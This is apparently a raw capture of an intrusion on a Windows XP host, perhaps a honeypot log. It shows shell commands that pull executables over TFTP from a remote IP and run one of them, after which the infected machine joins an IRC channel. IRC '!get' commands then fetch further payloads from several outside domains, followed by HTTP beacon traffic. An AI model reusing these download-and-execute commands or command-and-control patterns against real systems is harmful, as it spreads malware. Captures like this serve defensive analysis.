Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 39.121.188.32 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows XP [Version 5.1.2600] 
VICTIM:  	(C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\winsFile Not FoundC:\\WINDOWS\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcacheFile Not FoundC:\\WINDOWS\\system32> 
VICTIM:  	tftp -i 39.121.188.32 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	Transfer successful: 29184 bytes in 26 seconds, 1122 bytes/s 
VICTIM:  	Transfer successful: 29184 bytes in 26 seconds, 1122 bytes/sC:\\WINDOWS\\system32> 
VICTIM:  	tftp -i 39.121.188.32 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	Transfer successful: 19968 bytes in 14 seconds, 1426 bytes/s 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK cwdgslmaUSER c020501 . . :- 
VICTIM:  	JOIN &virtu 
ATTACKER:	:u. PRIVMSG cwdgslma :!get http:/k.russiamimi.net:88/sb.txt:u. PRIVMSG cwdgslma :!get http:/loki89.com/ju.txt:u. PRIVMSG cwdgslma :!get http:/141.136.27.220/cluble.com.exe 
VICTIM:  	GET /sb.txt HTTP/1.0User-Agent: DownloadHost: k.russiamimi.net:88Pragma: no-cache 
ATTACKER:	GET /jiba.asp HTTP/1.0User-Agent: CA 0.0.0.2Host: k.russiamimi.net:520 
ATTACKER:	GET /ck.txt HTTP/1.0User-Agent: CA 0.0.0.2Host: k.russiamimi.net:88Cookie: ASPSESSIONIDSCQDSQDS=POFMKEOBBIILGGADNHPJFNPI 
ATTACKER:	GET /park/check.asp HTTP/1.0User-Agent: CA 0.0.0.2Host: ga.9kusddaily.com:88 
ATTACKER:	GET /ju.txt HTTP/1.0User-Agent: DownloadHost: loki89.comPragma: no-cache 
ATTACKER:	GET /aack.txt HTTP/1.0User-Agent: CA 0.0.0.2Host: k.russiamimi.net:88Cookie: ASPSESSIONIDSCQDSQDS=POFMKEOBBIILGGADNHPJFNPI 
ATTACKER:	GET /nack.txt HTTP/1.0User-Agent: CA 0.0.0.2Host: k.russiamimi.net:88Cookie: ASPSESSIONIDSCQDSQDS=POFMKEOBBIILGGADNHPJFNPI 
ATTACKER:	GET /alitr3.txt HTTP/1.0User-Agent: CA 0.0.0.2Host: k.russiamimi.net:88Cookie: ASPSESSIONIDSCQDSQDS=POFMKEOBBIILGGADNHPJFNPI 
ATTACKER:	GET /afei.txt HTTP/1.0User-Agent: CA 0.0.0.2Host: k.russiamimi.net:88Cookie: ASPSESSIONIDSCQDSQDS=POFMKEOBBIILGGADNHPJFNPI 
ATTACKER:	GET /park/update.asp?AppVersion=20120311 HTTP/1.0User-Agent: CA 0.0.0.2Host: ga.9kusddaily.com:88 
ATTACKER:	GET /p6.asp?tid=0&aid=0&Publicer=1tr2&MAC=00-0C-29-0E-2C-21 HTTP/1.0User-Agent: CA 0.0.0.2Host: www.zzxml.com 
ATTACKER:	GET / HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: fihw.comConnection: Keep-Alive 
ATTACKER:	GET /js.php?id=1123 HTTP/1.0Accept: */*Referer: http:/fihw.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: fihw.comConnection: Keep-AliveCookie: Apache=192.168.1.144.1347203026367070; fihw.com[L]=1347203026; fihw.com[U]=1; fihw.com[V]=0.3; fihw.com[R]=0; fihw.com[D]=0; fihw.com[OR]=deleted 
ATTACKER:	GET /css.php?id=1123 HTTP/1.0Accept: */*Referer: http:/fihw.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: fihw.comConnection: Keep-AliveCookie: Apache=192.168.1.144.1347203026367070; fihw.com[L]=1347203026; fihw.com[U]=1; fihw.com[V]=0.3; fihw.com[R]=0; fihw.com[D]=0; fihw.com[OR]=deleted 
ATTACKER:	GET /ga.js HTTP/1.0Accept: */*Referer: http:/fihw.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: www.google-analytics.comConnection: Keep-Alive 
ATTACKER:	GET /relative/static/1330035304_bg-grad.gif HTTP/1.0Accept: */*Referer: http:/fihw.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: images01.tzimg.comConnection: Keep-Alive 
ATTACKER:	GET /image.php?FilePath=h3w4/1189022687_19130289.jpg&Width=500 HTTP/1.0Accept: */*Referer: http:/fihw.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: images01.tzimg.comConnection: Keep-Alive 
ATTACKER:	GET /cache/h3w4/500_1189022687_19130289.jpg HTTP/1.0Accept: */*Referer: http:/fihw.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: images01.tzimg.comConnection: Keep-Alive